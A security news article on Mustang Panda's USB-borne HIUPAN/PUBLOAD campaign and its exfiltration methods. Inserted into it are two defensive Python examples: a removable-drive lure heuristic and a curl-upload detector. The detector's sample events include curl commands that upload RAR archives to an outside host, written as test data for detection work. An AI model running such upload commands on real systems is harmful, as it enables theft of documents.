Mustang Panda uses a new infostealer to target government orgs

September 11, 2024

The notorious Chinese-speaking cybercriminal organisation Mustang Panda has shifted to a new tactic that relies on new methods and new malware to steal information.

According to reports, this advanced persistent threat group uses malware such as FDMTP and PTSOCKET to download payloads and steal data from compromised networks. The researchers also found that the hackers delivered the PUBLOAD malware loader through removable drives infected with a variant of the HIUPAN worm.

The threat actor in this campaign is a Chinese state-backed hacker group that conducts cyberespionage campaigns against government and non-government entities. This group’s primary target is countries within the Asia-Pacific region, but it occasionally attacks other areas.


Mustang Panda has been notorious for using spear-phishing emails to execute its campaign, but not in this instance.


A new investigation into this Mustang Panda campaign shows that, instead of its usual infection process of spear-phishing emails, the group spreads PUBLOAD across the network via removable drives infected with a variant of the HIUPAN worm.

HIUPAN hides its presence by moving all of the drive's contents into a hidden directory, leaving only a seemingly legitimate file, USBConfig.exe, visible on the device to trick targeted users into running it.
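A defender-side check for the drive layout described above, added here as an example and not code from the original report or from any vendor's tooling. It scores the root listing of a removable drive for the shape the article describes (one visible executable next to hidden directories, with USBConfig.exe as the reported lure name); the listing format, the scoring rules and the sample listings are assumptions made for this example.

```python
"""Heuristic for the HIUPAN-style removable-drive layout (added example).

The report says the worm moves the drive's real contents into a hidden
directory and leaves only a plausible-looking USBConfig.exe visible.  This
module scores a root directory listing for that shape.  The Entry format,
the scoring rules and SAMPLE_* listings are constructed for this example.
"""
import os
import stat
from dataclasses import dataclass


@dataclass(frozen=True)
class Entry:
    name: str
    is_dir: bool
    hidden: bool  # FILE_ATTRIBUTE_HIDDEN on Windows, dot-prefix elsewhere


EXECUTABLE_SUFFIXES = (".exe", ".scr", ".com", ".pif")
REPORTED_LURE_NAME = "usbconfig.exe"  # name given in the report


def suspicious_removable_layout(entries):
    """Return the reasons a drive-root listing looks like the described lure.

    An empty list means nothing matched.  The rules are assumptions for this
    example, not a signature published for HIUPAN.
    """
    visible = [e for e in entries if not e.hidden]
    hidden_dirs = [e for e in entries if e.hidden and e.is_dir]
    visible_exes = [
        e for e in visible
        if not e.is_dir and e.name.lower().endswith(EXECUTABLE_SUFFIXES)
    ]
    reasons = []
    if len(visible) == 1 and visible_exes:
        reasons.append("only visible item at the drive root is an executable")
    if visible_exes and hidden_dirs:
        reasons.append("visible executable sits beside hidden directories")
    if any(e.name.lower() == REPORTED_LURE_NAME for e in visible_exes):
        reasons.append("visible executable is named USBConfig.exe")
    return reasons


def listing_from_path(root):
    """Build Entry objects from a real directory (e.g. a mounted drive root)."""
    entries = []
    for de in os.scandir(root):
        st = de.stat(follow_symlinks=False)
        # st_file_attributes only exists on Windows; fall back to dot-prefix.
        attrs = getattr(st, "st_file_attributes", 0)
        hidden = bool(attrs & stat.FILE_ATTRIBUTE_HIDDEN) or de.name.startswith(".")
        entries.append(Entry(de.name, de.is_dir(follow_symlinks=False), hidden))
    return entries


# Constructed sample listings (not from a real infection).
SAMPLE_LURE = [
    Entry("USBConfig.exe", is_dir=False, hidden=False),
    Entry("_", is_dir=True, hidden=True),
]
SAMPLE_BENIGN = [
    Entry("report.docx", is_dir=False, hidden=False),
    Entry("photos", is_dir=True, hidden=False),
    Entry("System Volume Information", is_dir=True, hidden=True),
]

if __name__ == "__main__":
    for label, listing in (("lure", SAMPLE_LURE), ("benign", SAMPLE_BENIGN)):
        print(label, suspicious_removable_layout(listing))
```

Run `listing_from_path("E:\\")` (or the mount point of the drive) to score a real device; treat a non-empty result as a prompt to image the drive and check autorun and recent process-creation telemetry rather than as a verdict on its own, since a legitimate installer disk can also expose a single executable.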

PUBLOAD is the primary control tool in this new attack chain. It is launched on the machine via DLL sideloading, establishes persistence by modifying the Windows Registry, and then runs reconnaissance commands to map the network.

The threat actor additionally uses malware called FDMTP as a secondary control tool. The researchers explained that it is embedded in the data section of a DLL and can likewise be delivered through DLL sideloading.

In the recent Mustang Panda campaigns, the collected data is staged in RAR archives; the collection targets various file formats, such as XLS, XLSX, DOC, DOCX, PDF, PPT, and PPTX, from specific cutoff dates onward.

The threat actor then exfiltrates the stolen information using PUBLOAD and the cURL tool. The group's custom PTSOCKET file-transfer tool offers an alternative channel that uses TouchSocket over DMTP.
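Because the report names cURL as an exfiltration tool and RAR archives of office documents as the staged data, one useful detection is to flag process-creation events where curl uploads such a file. The example below is added here and is not code from the original report; its event format, sample events (including the 203.0.113.x documentation addresses) and the list of upload flags are constructed for this example, so adapt the parser to your own EDR or Sysmon export.

```python
"""Flag curl invocations that upload staged archives or documents (added example).

Events are (image_path, command_line) pairs, a constructed format standing in
for Sysmon event 1 / EDR process-creation records.  The upload flags listed
are standard curl options; the sample events are constructed, not observed.
"""
import ntpath
import shlex

# curl options that send a local file or form body to the server
UPLOAD_FLAGS = {"-T", "--upload-file", "-F", "--form", "-d", "--data", "--data-binary"}
# archive and document types named in the report, plus common archive formats
STAGED_SUFFIXES = (".rar", ".zip", ".7z",
                   ".xls", ".xlsx", ".doc", ".docx", ".pdf", ".ppt", ".pptx")
CURL_IMAGES = {"curl.exe", "curl"}


def curl_upload_targets(cmdline):
    """Return the local files a curl command line would upload, or []."""
    try:
        # posix=False keeps Windows backslashes and quoted tokens intact
        tokens = shlex.split(cmdline, posix=False)
    except ValueError:
        return []
    uploads = []
    for i, tok in enumerate(tokens):
        flag, _, inline = tok.partition("=")  # handles --upload-file=PATH
        if flag not in UPLOAD_FLAGS:
            continue
        arg = inline or (tokens[i + 1] if i + 1 < len(tokens) else "")
        arg = arg.strip('"')
        # -F field=@PATH and -d @PATH reference local files with '@'
        path = arg.split("=@", 1)[1] if "=@" in arg else arg.lstrip("@")
        if path.lower().endswith(STAGED_SUFFIXES):
            uploads.append(path)
    return uploads


def flag_events(events):
    """Return (image, [uploaded files]) for curl events that upload staged data."""
    hits = []
    for image, cmdline in events:
        if ntpath.basename(image).lower() not in CURL_IMAGES:
            continue
        uploads = curl_upload_targets(cmdline)
        if uploads:
            hits.append((image, uploads))
    return hits


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\curl.exe",
     r'curl.exe -T "C:\Users\a\AppData\Local\Temp\docs.rar" https://203.0.113.5/upload'),
    (r"C:\Windows\System32\curl.exe",
     r"curl.exe -s https://203.0.113.5/health"),
    (r"C:\Program Files\Git\mingw64\bin\curl.exe",
     r'curl.exe -F "file=@C:\stage\2024.rar" https://203.0.113.5/api'),
    (r"C:\Windows\System32\cmd.exe", r"cmd.exe /c dir"),
]

if __name__ == "__main__":
    for image, uploads in flag_events(SAMPLE_EVENTS):
        print(image, "->", uploads)
```

On a real fleet, pair this with the parent process and user context: curl launched by an office application, a sideloaded DLL host, or from a removable drive path is far more significant than the same command typed in an administrator's shell.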

This campaign followed closely on Mustang Panda's rapid spear-phishing campaign a few months earlier. Researchers advise organisations, especially in the Asia-Pacific region, to be wary of the group's recent activities, since it has been highly active over the past few months.
